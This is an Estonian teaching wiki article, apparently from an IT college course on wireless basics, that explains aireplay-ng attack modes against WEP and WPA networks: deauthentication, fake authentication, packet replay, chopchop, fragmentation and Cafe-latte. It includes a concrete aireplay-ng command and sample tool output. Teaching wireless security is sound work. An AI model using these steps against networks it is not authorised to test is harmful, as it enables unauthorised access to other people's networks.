See rünnak lubab valida konkreetse paketti mida taasmängida. Selle meetodiga saab pakette lugeda kahest kohast, võrgust ja failist. Keskendume võrgust püüdmisele.&lt;br /&gt;
Et interaktiivne uuestimängimine töötaks on tähtis veidi alusteadmisi paketivoo kohta. Iga pakett ei tööta selle rünnakuga. Õnnestumine tähendab seda et AP võtab paki vastu ja genereerib uue IV - WEP ründamiseks on vaja ju koguda palju IV&#039;sid.&lt;br /&gt;
Väga kasulik on panna peale ka &amp;quot;-m 68 -n 86&amp;quot; filtrid. Need filtreerivad vastavalt minimaalse paki suuruse(68- traadita klientilt) ja maksimaalse(86- traadiga kliendilt). Need on WEP ühenduses ARP pakettide suurused ning õigesti kasutades peaksid tagama vastuse AP poolt.[8]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Naturaalsed paketid===&lt;br /&gt;
&lt;br /&gt;
Et seda teha, tuleb meil kas taasmängida originaalpaketti, või paketti veidi manipuleerida.  AP&#039;d edastavad(tekitavad uue IV) alati pakkidele mis on suunatud broadcast MACi(FF:FF:FF:FF:FF:FF) vastu. Selline omadus on näiteks ARP pakettidel. Peale selle on vajalik et pakett liiguks traadita kliendist traadiga võrku. Sellisel pakettil on &amp;quot;To DS&amp;quot; lipuke seatud &amp;quot;1&amp;quot; peale.&lt;br /&gt;
Need  filtrid on seadistatavad -b,-d ja -t argumentidega.[8]&lt;br /&gt;
&lt;br /&gt;
===Manipuleeritavad pakid===&lt;br /&gt;
&lt;br /&gt;
Eesmärk, nagu alati, on panna AP genereerima uusi IV&#039;sid. Ainuke vajalik argument on &amp;quot;-t 1&amp;quot; - see selekteerib ainult pakette mis liiguvad etherneti suunas.&lt;br /&gt;
&lt;br /&gt;
Me ei hooli ka mis lõppunkti MAC aadress on, kuna  me saame selle ära muuta.  Selleks on &amp;quot;-p 0841&amp;quot; argument, mis  muudab paki põhimõtte selliseks nagu ta saadetaks kliendist  AP&#039;sse - põmst. muudab &amp;quot;To DS&amp;quot; lipu &amp;quot;1&amp;quot;. Vaja on anda ka &amp;quot;-c&amp;quot; väärtuseks broadcast MAC.[8]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Klientideta võrgu ründamine===&lt;br /&gt;
Sellel meetodil on väga huvitav omadus see, et saab rünnata ka traadita-klientideta AP&#039;d. Jooksuta aireplay-d kõige elementaarsemate argumentidega:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -2 -b 00:14:6C:7E:40:80 -d FF:FF:FF:FF:FF:FF -t 1 ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nüüd jääb üle vaid oodata kuni mõni pakett broadcasti saadetakse. Pole tähtis milline pakket, sisesta lihtsalt &amp;quot;y&amp;quot; esimesele tulevale pakile ja AP hakkab IV&#039;sid genereerima. Negatiivne külg asjal on tõsiasi et paljud pakid on suhteliselt suured - suured pakid genereerivad IV&#039;sid aeglasemalt. Suur pluss on see et ei ole vaja kinni püüda xor paketistriimi(chopchop või fragmenteeritud rünnakud), ehitada pakki ja käivitada relay rünnakut.[8]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 3: ARP request replay attack==&lt;br /&gt;
Klassikaline ARP päringu taasmängimise rünnak on efektiivseim viis IV&#039;de genereerimiseks, ja ta töötab ka piisavalt stabiilselt. Programm kuulab ARP paketti(tunneb ära kindlate mittekrüptimata väljade järgi ja paki pikkuse järgi) ning hakkab seda AP&#039;le taasmängima. See omakorda põhjustab igale päringu vastusele uue IV genereerimise.&lt;br /&gt;
Seda rünnakut võib lugeda interaktiivse taasmängimise erijuhuks.[9]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 4: KoreK chopchop attack==&lt;br /&gt;
See rünnak suudab hea õnne korral dekrüptida WEP paketi ilma salajast võtit teadmata. Meetod võib töötada isegi dünaamilise WEP vastu. See rünnak ei tagasta sulle WEP salajast võtit, vaid paketi sisu ja selle paketi krüptimiseks kasutatud keystreami. Mõned AP&#039;d ei ole sellele rünnakule avatud. Kui AP dropib pakke mille pikkus on alla 42 baidi, siis aireplay üritab ülejäänud baidid ära arvata - edukuse tõenäosus oleneb headerite ennustusvõimest. Kui püütakse kinni IP pakett, siis tehakse lisaks veel checksum kontroll peale arvatava lisabaitide juurdelisamist. Rünnakuks on vaja vähemalt ühte WEP paketti.[10]&lt;br /&gt;
&lt;br /&gt;
===Teooria===&lt;br /&gt;
KoreK kasutab hästituntud nõrga ICV[link] probleemi ja järeldab sellest, et kui pakki lühendada ühe baidi võrra, siis saab sellest ehitada uue korrektse paki, kuna uus ICV on otseselt seotud puuduva krüptimata baidiga. [11]&lt;br /&gt;
&lt;br /&gt;
Esimene samm on võtta püütud pakett (M) ja eemaldada viimane bait, et saada sõnum M-1. Kuna me ei tea eemaldatud baidi &#039;&#039;plaintekst&#039;&#039; väärtust, peame hakkama seda arvama. Õnneks on ainult 256 võimalikku baidiväärtust. Esmaks eeldame siis et eemaldatud bait oli 0x00 ja paneme saadud sõnumi valemisse(liiga mahukas et siin kirjeldada), et luua abitmask mis üritab muuta ebakorrektset M-1 paketti valiidseks M-1 paketiks. Siis proovime paki korrektsust pritsides selle võrku. Kui AP selle kätte saab, siis kontrollitakse seda ja vastavalt aksepteeritakse või ignoreeritakse. Iga saadetud pakk baseerub arvataval baidil, niiet tõenäosus õige olla on 1/256. Kui pakett on aga õige, siis AP valideerib selle ja edastab võrku. Eeldades et sa samal ajal kuulad võrku saad näha kui AP seda teeb. Sellisel juhul tead mis on paki viimane bait. Siis on võimalik arvutada PRGA väärtus mida kasutati selle plaintekst baidi krüptimiseks(P XOR M = RC4 PRGA). Ühesõnaga, ründaja saab bait baidi haaval kogu paketi niimoodi ära arvata, boonuseks on ka keystream millega saad oma paki luua.[11]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt; .........&lt;br /&gt;
 Offset   38 (90% done) | xor = FD | pt = 08 |  229 frames written in   688ms&lt;br /&gt;
 Offset   37 (92% done) | xor = 13 | pt = 01 |  232 frames written in   695ms&lt;br /&gt;
 Offset   36 (94% done) | xor = 83 | pt = 00 |   19 frames written in    58ms&lt;br /&gt;
 Offset   35 (96% done) | xor = 4E | pt = 06 |  230 frames written in   689ms&lt;br /&gt;
 Sent 957 packets, current guess: B9...&lt;br /&gt;
 &lt;br /&gt;
 The AP appears to drop packets shorter than 35 bytes.&lt;br /&gt;
 Enabling standard workaround: ARP header re-creation.&lt;br /&gt;
 &lt;br /&gt;
 Saving plaintext in replay_dec-0201-191706.cap&lt;br /&gt;
 Saving keystream in replay_dec-0201-191706.xor&lt;br /&gt;
 &lt;br /&gt;
 Completed in 21s (2.29 bytes/s)&amp;lt;/pre&amp;gt;&lt;br /&gt;
Jee! Saad kasutada xor faili oma paki injectimiseks või lugeda paki sisu .cap failist. Vaata ainult et paki injectimisel kasutad autentitud source maci, väga väheste ruuterite korral töötab paki sisestamine &#039;&#039;broadcasti&#039;&#039; ilma autentimata. Soovitatav on võtta ka lühem pakett kuna dekrüptimise aeg on lineaarselt seotud paketi pikkusega.[10]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 5: Fragmentation attack==&lt;br /&gt;
Õnnestumise korral suudab see rünnak tagastada sulle kuni 1500 baiti PRGA&#039;d. See rünnak ei tagasta WEP võtit. Saadud PRGA&#039;ga saab krüptida oma loodud pakette ja neid võrku injectida. Ründamiseks on vaja saada AP&#039;lt vähemalt üks pakett.[12]&lt;br /&gt;
&lt;br /&gt;
Põhimõtteliselt saab programm paketist väikese hulga võtmematerjali ning üritab saata ARP või LLC pakette(kuna selliste pakettide sisu on teada) AP&#039;le. Kui pakett kajatakse tagasi AP poolt siis saab tagastatud paketi põhjal tuletada suurema hulga PRGA baite. Tsüklit saab korrata kuni saadakse kätte kuni 1500 baiti.[12]&lt;br /&gt;
&lt;br /&gt;
See rünnak nõuab head ühendust AP&#039;ga, kuna ründaja fragmenteerib pakette ja AP peab need kõik kätte saama.[12]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Saving chosen packet in replay_src-0124-161120.cap&lt;br /&gt;
 Data packet found!&lt;br /&gt;
 Sending fragmented packet&lt;br /&gt;
 Got RELAYED packet!!&lt;br /&gt;
 Thats our ARP packet!&lt;br /&gt;
 Trying to get 384 bytes of a keystream&lt;br /&gt;
 Got RELAYED packet!!&lt;br /&gt;
 Thats our ARP packet!&lt;br /&gt;
 Trying to get 1500 bytes of a keystream&lt;br /&gt;
 Got RELAYED packet!!&lt;br /&gt;
 Thats our ARP packet!&lt;br /&gt;
 Saving keystream in fragment-0124-161129.xor&lt;br /&gt;
 Now you can build a packet with packetforge-ng out of that 1500 bytes keystream&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ja meil ongi olemas .xor fail millega saab &#039;&#039;custom&#039;&#039; pakette injectida. Muidugi on vajalik assotsiaseeritud klienti kelle nimelt pakette injectida.[12]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 6: Cafe-latte attack==&lt;br /&gt;
Iga WEP klient kes saab ARP päringu vastab sellele automaatselt korrektselt krüptitud ARP vastustega - selle etapini jõudmiseks ei pea AP tõestama et ta WEP võtit teab.&lt;br /&gt;
Selle rünnakuga saab kinnipüütud paketis pöörata ümber mõned bitid mille käigus pööratakse kliendi ARP päring ta enda poole tagasi. Saates võltsitud ARP päringut kliendile korduvalt saame kinni püüda suurel hulgal korrektseid krüptitud ARP vastuseid.[13]&lt;br /&gt;
&lt;br /&gt;
See rünnak töötab kuna WEP ei ole nõrk mitte ainult statistilise analüüsi rünnakute vastu, vaid tal puudub ka krüptograafilise tugevusega paki terviklikkuse kontroll.&lt;br /&gt;
Lühidalt öeldes ei suuda osapooled eristada võltsitud/modifitseeritud paketti korrektsest pakist.[13]&lt;br /&gt;
&lt;br /&gt;
Iga WEP pakett kasutab CRC checksumi ülekande vigade tuvastamiseks. Ammu aga teatakse et ründaja saab muuta nii paki sisu kui ka CRC&#039;d et luua uus korrektne pakk. Cafe-latte kasutab neid nõrkusi ja muudab ära saatja MACi ja saatja IP aadressi mis sisalduvad kliendi ARP päringus ning suunavad need kliendi vastu.[13]&lt;br /&gt;
&lt;br /&gt;
Kuna klient ei suuda võltsingut eristada, vastabki ka igale päringule.[13]&lt;br /&gt;
&lt;br /&gt;
===Kasutamine===&lt;br /&gt;
Seda rünnakut saab kasutada reaalsest võrgust eraldatud kliendi puhul. Kliendid teevad tuntud võrkude otsimisel PROBE päringuid, millele saab ründaja siis fake APga vastata. Sellisel juhul peaks kasutama &amp;quot;-D&amp;quot; argumenti et lülitada välja AP otsimine.[14]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 7: Client-oriented fragmentation attack==&lt;br /&gt;
Selle rünnakuga saab kasutada suvalist IP või ARP paketti. See laiendab Cafe-Latte rünnakut lubades kasutada suvalist paketti kliendilt.&lt;br /&gt;
Sellest paketist peame genereerima ARP päringu. ARPil peab asuma baidipositsioonil 33 sihtmärgi IP ning sihtmärgi MAC peab olema nullbaidi jada.&lt;br /&gt;
Praktikas võib sihtmärgi MAC olla aga suvaline väärtus.[15]&lt;br /&gt;
&lt;br /&gt;
Saadud pakis on teada koht kus asub lähtepunkti IP aadress - bait 23 ARP puhul ja 21 IP puhul. Eeldatakse et pakk on ARP kui paki suurus on 68 või 86 baiti, vastaseljuhul eeldatakse et on IP pakett.[15]&lt;br /&gt;
&lt;br /&gt;
===ARP===&lt;br /&gt;
Korrektse ARP päringu saatmiseks kliendile peame liigutama lähtekoha IP aadress positsioonile 33. Muidugi ei saa seda niisama lihtsalt teha - pakk ei valideeruks. Selle vastu kasutame aga paketi fragmenteerimist. ARP saadetakse kliendile kahe fragmendina. Esimese fragmendi pikkus valitakse niimoodi et paketi kokkupanemisel kliendi poolt satuks lähtekoha(kliendi) IP positsioonile 33(sihtmärk). Teine fragment on pakett mis kliendilt alguses saadi.[15]&lt;br /&gt;
&lt;br /&gt;
===IP===&lt;br /&gt;
IP paketi puhul kasutatakse sarnast meetodit. Aga kuna PRGA materjali on vähem, siis saadetakse välja kolm fragmenti pluss algne pakk.[15]&lt;br /&gt;
&lt;br /&gt;
Igaljuhul kasutatakse CRC korrektsuse säilitamiseks bit-flippingut. Sama meetodit kasutatakse ka ARP paketi lähtekoha MAC&#039;i muutmiseks juhul kui seal on algselt &#039;&#039;multicast&#039;&#039;.[15]&lt;br /&gt;
&lt;br /&gt;
=Viited=&lt;br /&gt;
[1] http://www.aircrack-ng.org/doku.php?id=aireplay-ng&lt;br /&gt;
&lt;br /&gt;
[2] http://www.aircrack-ng.org/doku.php?id=deauthentication&lt;br /&gt;
&lt;br /&gt;
[3] http://www.aircrack-ng.org/doku.php?id=fake_authentication&lt;br /&gt;
&lt;br /&gt;
[4] https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy&lt;br /&gt;
&lt;br /&gt;
[5] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-08.html&lt;br /&gt;
&lt;br /&gt;
[6] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-09.html&lt;br /&gt;
&lt;br /&gt;
[7] http://www.aircrack-ng.org/doku.php?id=shared_key&lt;br /&gt;
&lt;br /&gt;
[8] http://www.aircrack-ng.org/doku.php?id=interactive_packet_replay&lt;br /&gt;
&lt;br /&gt;
[9] http://www.aircrack-ng.org/doku.php?id=arp-request_reinjection&lt;br /&gt;
&lt;br /&gt;
[10] http://www.aircrack-ng.org/doku.php?id=korek_chopchop&lt;br /&gt;
&lt;br /&gt;
[11] http://www.informit.com/guides/content.aspx?g=security&amp;amp;seqNum=197&lt;br /&gt;
&lt;br /&gt;
[12] http://www.aircrack-ng.org/doku.php?id=fragmentation&lt;br /&gt;
&lt;br /&gt;
[13] http://www.wi-fiplanet.com/tutorials/article.php/10724_3716241_2&lt;br /&gt;
&lt;br /&gt;
[14] http://www.aircrack-ng.org/doku.php?id=cafe-latte&lt;br /&gt;
&lt;br /&gt;
[15] http://www.aircrack-ng.org/doku.php?id=hirte&lt;br /&gt;
&lt;br /&gt;
\[\[Category:Traadita_side_alused]]&lt;/div&gt;</summary>
		<author><name>Tliiv</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Aireplay-ng_r%C3%BCndere%C5%BEiimid&amp;diff=30978</id>
		<title>Aireplay-ng ründerežiimid</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Aireplay-ng_r%C3%BCndere%C5%BEiimid&amp;diff=30978"/>
		<updated>2011-05-10T10:36:03Z</updated>

		<summary type="html">&lt;p&gt;Tliiv: /* Rünnak 6: Cafe-latte attack */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Sissejuhatus=&lt;br /&gt;
&lt;br /&gt;
Aireplay-ng`d kasutatakse &#039;&#039;frame&#039;&#039;`de sisestamiseks võrguliiklusesse.[1]&lt;br /&gt;
&lt;br /&gt;
Peamine funktsioon on liikluse genereerimine hilisemaks kasutamiseks aircrack-ng`s - [https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy WEP] ja [https://secure.wikimedia.org/wikipedia/en/wiki/WPA-PSK WPA-PSK] võtmete lahtimurdmiseks. Erinevad rünnakuviisid võimaldavad tekitada deautentimist WPA &#039;&#039;handshake&#039;&#039; pakettide püüdmiseks, võlts deautentimiseks, interaktiivseks pakettide taasmängimiseks ja käsitsi valmistatud ARP päringute sisestamiseks liiklusesse.[1]&lt;br /&gt;
&lt;br /&gt;
=Eelteadmised=&lt;br /&gt;
WEP ja WPA/WPA2 võrkude ründamiseks on vajalikud mõned konkreetsed eelteadmised. Nende teadmine lihtsustab suurel määral võimalike probleemide lahendamist ja annab paremini aimu millega tegu on ja kuidas asjad &#039;&#039;backendis&#039;&#039; töötavad - ei teki näiteks viga kus üritatakse taasmängida paketti kui ühtegi klienti pole APga assotsiaseerunud.&lt;br /&gt;
&lt;br /&gt;
Samuti eeldatakse et teatakse aireplay-ng põhikäske ja argumente - nullist õppimiseks ei ole see mõeldud.&lt;br /&gt;
&lt;br /&gt;
==WEP==&lt;br /&gt;
WEPi ründamiseks on vaja eristada Open Authentication ja Shared Key Authentication süsteemi&lt;br /&gt;
===Open Authentication===&lt;br /&gt;
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationOpen.jpg][5]&lt;br /&gt;
&lt;br /&gt;
* Klient saadab autentimis päringu AP&#039;le.[5]&lt;br /&gt;
* AP autentib kliendi.[5]&lt;br /&gt;
** AP laseb selles etapis kõik kliendid läbi, st. mingit autentimist(sõna otseses mõttes) ei toimu[5]&lt;br /&gt;
* Klient assotsiaseerub AP&#039;ga ja liitub võrguga.[5]&lt;br /&gt;
** Selles etapis hakkavad mõlemad osapooled andmeid saatma WEPi krüpteeringuga, st. edasiseks suhtlemiseks on vaja teada salajast võtit. Sellesse punkti jõudes on võimalik assotsiaseerunud kliendi MACiga saata AP&#039;le pakette(nõrkus).[5]&lt;br /&gt;
&lt;br /&gt;
===Shared Key Authentication===&lt;br /&gt;
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationShared.jpg] [6]&lt;br /&gt;
&lt;br /&gt;
* Klient saadab autentimise päringu AP&#039;le.[6]&lt;br /&gt;
* AP saadab kliendile &#039;&#039;random&#039;&#039; baidijada(ülesanne).[6]&lt;br /&gt;
* Klient kasutab oma 64- või 128bitist salajast võtit ning krüptib saadud baidijada ära, ning saadab tagasi AP&#039;le.[6]&lt;br /&gt;
* AP dekrüptib saadud jada ning võrdleb seda esialgu väljasaadetud stringiga, kui need ei kattu, siis saadetakse kliendile negatiivne vastus. Kui kattub siis järelikult on kliendil ja AP&#039;l sama WEP võti, ning AP autentib kliendi ära.[6]&lt;br /&gt;
* Klient ühendub võrku.[6]&lt;br /&gt;
&lt;br /&gt;
Sellisel juhul ei ole võimalik autentimisest edasi saada ilma võtmeta, ning seega ei saa ka AP&#039;le pakke võrku sisestada. (Lahendus probleemile on #Shared Key Authentication artikli all)&lt;br /&gt;
&lt;br /&gt;
=Meetodid=&lt;br /&gt;
Meetodite pealkrijade ees on &amp;quot;Rünnak x:&amp;quot;. x tähistab numbrit mitmes implementeeritud rünnak see on ja seda numbrit aksepteerib aireplay-ng ka vastava käsurea lipu argumendina.&lt;br /&gt;
==Rünnak 0: Deauthentication==&lt;br /&gt;
&lt;br /&gt;
See meetod saab disassotsiaseerumise paketi ühele või rohkemale kliendile kes on parasjagu vastava &#039;&#039;access pointiga&#039;&#039; assotsiaseerunud. Klientide lahtiühendamisel võib olla mitu eesmärki:[2]&lt;br /&gt;
&lt;br /&gt;
* Peidetud ESSID kättesaamine. See on ESSID mida access point ei kuuluta &#039;&#039;broadcastis&#039;&#039;.[2]&lt;br /&gt;
* WPA/WPA2 handshake kinnipüüdmine sundides klienti uuesti autentima.(Ei ole kohustuslik, võib oodata ka kuni klient ise uuesti ühendub)[2]&lt;br /&gt;
* ARP päringute genereerimine(Windowsi kliendid võivad mõnikord oma ARP &#039;&#039;cache&#039;&#039; tühjendada kui ühendus ära kaob)[2]&lt;br /&gt;
&lt;br /&gt;
NB! Arusaadavalt on see rünnak täiesti kasutu kui traadita ühenduspunkti küljes ei ole ühtegi reaalset assotsiaseerunud klienti või võlts autentitud klienti.[2]&lt;br /&gt;
&lt;br /&gt;
===Meetodid===&lt;br /&gt;
&lt;br /&gt;
====Suunatud====&lt;br /&gt;
&amp;lt;pre&amp;gt;Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9&lt;br /&gt;
12:35:25  Sending 64 directed DeAuth. STMAC: [00:0F:B5:AE:CE:9D] [ 61|63 ACKs]&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* BSSID peab olema sihtmärk AP korrektne MAC aadress[2]&lt;br /&gt;
* kanal peab olema sama millel AP reaalselt räägib[2]&lt;br /&gt;
* STMAC on rünnatava kliendi korrektne MAC aadress[2]&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Sending 64 directed&#039;&#039;&#039; - saadeti välja 64 suunatud deautentimise paketti, st. 64 kliendile ja 64 AP&#039;le.[2]&lt;br /&gt;
* &#039;&#039;&#039;61&#039;&#039;&#039; - mitu paketti klient kätte sai[2]&lt;br /&gt;
* &#039;&#039;&#039;63&#039;&#039;&#039; - mitu paketti AP kätte sai[2]&lt;br /&gt;
&lt;br /&gt;
Kui 61 ja 63 on arvud mis on suhteliselt stabiilsed ja lähedal 64&#039;le, siis tähendab see seda et mõlemad osapooled on sinu võrgukaardi antennist kuuldekaugusel ja nendega on võimalik infot vahetada. Kui üks neist numbritest on väike, siis tähendab seda et asud vastavast osapoolest liiga kaugel - sellisel juhul see rünnak ei tööta, sul on vaja kas saatja saatevõimet suurendada, või minna osapoolele füüsiliselt lähemale.[2]&lt;br /&gt;
&lt;br /&gt;
Suunatud &#039;&#039;versus&#039;&#039; broadcast olukorras on alati soovitav kasutada suunatud varianti, kuna paljud kliendid ignoreerivad broadcastis saadetud lahtiühendamise paketti.[2]&lt;br /&gt;
&lt;br /&gt;
Kui sulle kliendi ACK&#039;ide arv tundub korrektne, aga sulle ikkagi ei tundu et ta ennast lahti ühendaks, siis võib probleem peituda selles et ta ühendub uuesti liiga kiiresti.[2]&lt;br /&gt;
&lt;br /&gt;
====Broadcast====&lt;br /&gt;
&amp;lt;pre&amp;gt;Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9&lt;br /&gt;
NB: this attack is more effective when targeting&lt;br /&gt;
a connected wireless client (-c &amp;lt;client&#039;s mac&amp;gt;).&lt;br /&gt;
15:49:32  Sending DeAuth to broadcast -- BSSID: [00:14:6C:7E:40:80]&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nagu mainitud, &#039;&#039;broadcast&#039;&#039; lahtiühendamine on vähem efektiivsem.&lt;br /&gt;
&lt;br /&gt;
==Rünnak 1: Fake authentication==&lt;br /&gt;
Võlts autentimine lubab läbi viia nii Open System kui ka Shared Key WEP autentimist, peale selle teeb ta ka assotsiatsiooni access pointiga. See on kasulik ainult siis kui sul on vaja AP&#039;le pakettide saatmiseks assotsiaseeritud klienti, selle puudumisel ei võta AP ühtegi talle saadetud pakki vastu. Kui meil on aga reaalne klient, siis saame tema nimel pakke saata, kui pole, on vaja võlts autentimist.&lt;br /&gt;
Võlts autentimine ei tekita ARP pakette(seega ei piisa selle üksi kasutamisest) ja ei suuda assotsiaseeruda WPA/WPA2 access pointidega.[3]&lt;br /&gt;
&lt;br /&gt;
Fake authenticationit ei tohi kasutada aktiivse kliendi MACiga. See on eriti sobilik meetod selliseks juhuks kui olemasolevalt kliendilt on kinni püütud näiteks ARP pakett, ning klient ühendub lahti enne kui suudad piisavalt arp pakette tagasi mängida. Sellisel juhul aitab sama kliendi MACiga fake autentimine ning siis seda kinnipüütud pakki uuesti/edasi mängida.&lt;br /&gt;
&lt;br /&gt;
===Meetodid===&lt;br /&gt;
====Open Authentication====&lt;br /&gt;
Open authentication puhul ei üritata klienti enne assotsiaseerumist autentida, seega saame kerge vaevaga ennast ära assotsiaseeruda ning hakata AP&#039;ga suhtlema. Selles etapis hakkavad tavakliendid WEP&#039;i(ja seega ka salajast võtit) kasutades rääkima, meie aga saame sisestada juba korrektse võtmega krüptitud(reaalselt kliendilt varem püütud) pakke AP&#039;le saatma, uuesti ja uuesti.[4]&lt;br /&gt;
&amp;lt;pre&amp;gt;18:18:20  Sending Authentication Request&lt;br /&gt;
18:18:20  Authentication successful&lt;br /&gt;
18:18:20  Sending Association Request&lt;br /&gt;
18:18:20  Association successful :-)&amp;lt;/pre&amp;gt;&lt;br /&gt;
Sellisel juhul on assotsiaseerumine õnnestunud võib jätkata teiste rünnakutega - AP võtab vastu vastavalt MACilt tulevaid pakke, ja saadab õigetes tingimustes ka vastuseid.[4]&lt;br /&gt;
&lt;br /&gt;
====Shared Key Authentication====&lt;br /&gt;
SKA tähendab seda, et AP ei räägi potensiaalse kliendiga mitte midagi, va. WEP võtmega autentimise protokoll, seega ei ole võimalik meil AP&#039;ga assotsiaseeruda(me ei tea ju salajast võtit millega autentimisel AP saadetud puzzle ära &amp;quot;lahendada&amp;quot;) ning sellest tulenevalt ei saa me ka AP&#039;le mingeid pakke saata.&lt;br /&gt;
&amp;lt;pre&amp;gt;15:46:53  Sending Authentication Request&lt;br /&gt;
15:46:53  AP rejects open-system authentication&lt;br /&gt;
Please specify a PRGA-file (-y).&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Sellisel juhul on vaja kinni püüda SKA &#039;&#039;handshake&#039;&#039; paketid. See toimub automaatselt kui airodump-ng näeb mõnda WEP-SKA handshake&#039;i. Deauthentimise rünnakuga saab seda olemasolevale kliendile sundida.[7]&lt;br /&gt;
&lt;br /&gt;
Kinnipüütud &#039;&#039;handshake&#039;&#039;`id salvestatakse &amp;quot;sharedkey-01-00-14-6C-7E-40-80.xor&amp;quot; formaadis faili. See fail tuleb vastavasse AP&#039;sse fake autentimisel/kliendi disconnectimisks anda kaasa &amp;quot;-y&amp;quot; käsurea argumendiga.[7]&lt;br /&gt;
&lt;br /&gt;
NOTE: Kui airodump-ng jookseb ilma aktiivseid rünnakuid AP pihta tegemata, siis on AUTH väli WEP AP taga tühi. Kui airodump-ng näeb mända handshake&#039;i siis tuleb AUTH välja sisse SKA, samal hetkel salvestatakse ka fail.[7]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 2: Interactive packet replay==&lt;br /&gt;
&lt;br /&gt;
See rünnak lubab valida konkreetse paketti mida taasmängida. Selle meetodiga saab pakette lugeda kahest kohast, võrgust ja failist. Keskendume võrgust püüdmisele.&lt;br /&gt;
Et interaktiivne uuestimängimine töötaks on tähtis veidi alusteadmisi paketivoo kohta. Iga pakett ei tööta selle rünnakuga. Õnnestumine tähendab seda et AP võtab paki vastu ja genereerib uue IV - WEP ründamiseks on vaja ju koguda palju IV&#039;sid.&lt;br /&gt;
Väga kasulik on panna peale ka &amp;quot;-m 68 -n 86&amp;quot; filtrid. Need filtreerivad vastavalt minimaalse paki suuruse(68- traadita klientilt) ja maksimaalse(86- traadiga kliendilt). Need on WEP ühenduses ARP pakettide suurused ning õigesti kasutades peaksid tagama vastuse AP poolt.[8]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Naturaalsed paketid===&lt;br /&gt;
&lt;br /&gt;
Et seda teha, tuleb meil kas taasmängida originaalpaketti, või paketti veidi manipuleerida.  AP&#039;d edastavad(tekitavad uue IV) alati pakkidele mis on suunatud broadcast MACi(FF:FF:FF:FF:FF:FF) vastu. Selline omadus on näiteks ARP pakettidel. Peale selle on vajalik et pakett liiguks traadita kliendist traadiga võrku. Sellisel pakettil on &amp;quot;To DS&amp;quot; lipuke seatud &amp;quot;1&amp;quot; peale.&lt;br /&gt;
Need  filtrid on seadistatavad -b,-d ja -t argumentidega.[8]&lt;br /&gt;
&lt;br /&gt;
===Manipuleeritavad pakid===&lt;br /&gt;
&lt;br /&gt;
Eesmärk, nagu alati, on panna AP genereerima uusi IV&#039;sid. Ainuke vajalik argument on &amp;quot;-t 1&amp;quot; - see selekteerib ainult pakette mis liiguvad etherneti suunas.&lt;br /&gt;
&lt;br /&gt;
Me ei hooli ka mis lõppunkti MAC aadress on, kuna  me saame selle ära muuta.  Selleks on &amp;quot;-p 0841&amp;quot; argument, mis  muudab paki põhimõtte selliseks nagu ta saadetaks kliendist  AP&#039;sse - põmst. muudab &amp;quot;To DS&amp;quot; lipu &amp;quot;1&amp;quot;. Vaja on anda ka &amp;quot;-c&amp;quot; väärtuseks broadcast MAC.[8]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Klientideta võrgu ründamine===&lt;br /&gt;
Sellel meetodil on väga huvitav omadus see, et saab rünnata ka traadita-klientideta AP&#039;d. Jooksuta aireplay-d kõige elementaarsemate argumentidega:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -2 -b 00:14:6C:7E:40:80 -d FF:FF:FF:FF:FF:FF -t 1 ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nüüd jääb üle vaid oodata kuni mõni pakett broadcasti saadetakse. Pole tähtis milline pakket, sisesta lihtsalt &amp;quot;y&amp;quot; esimesele tulevale pakile ja AP hakkab IV&#039;sid genereerima. Negatiivne külg asjal on tõsiasi et paljud pakid on suhteliselt suured - suured pakid genereerivad IV&#039;sid aeglasemalt. Suur pluss on see et ei ole vaja kinni püüda xor paketistriimi(chopchop või fragmenteeritud rünnakud), ehitada pakki ja käivitada relay rünnakut.[8]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 3: ARP request replay attack==&lt;br /&gt;
Klassikaline ARP päringu taasmängimise rünnak on efektiivseim viis IV&#039;de genereerimiseks, ja ta töötab ka piisavalt stabiilselt. Programm kuulab ARP paketti(tunneb ära kindlate mittekrüptimata väljade järgi ja paki pikkuse järgi) ning hakkab seda AP&#039;le taasmängima. See omakorda põhjustab igale päringu vastusele uue IV genereerimise.&lt;br /&gt;
Seda rünnakut võib lugeda interaktiivse taasmängimise erijuhuks.[9]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 4: KoreK chopchop attack==&lt;br /&gt;
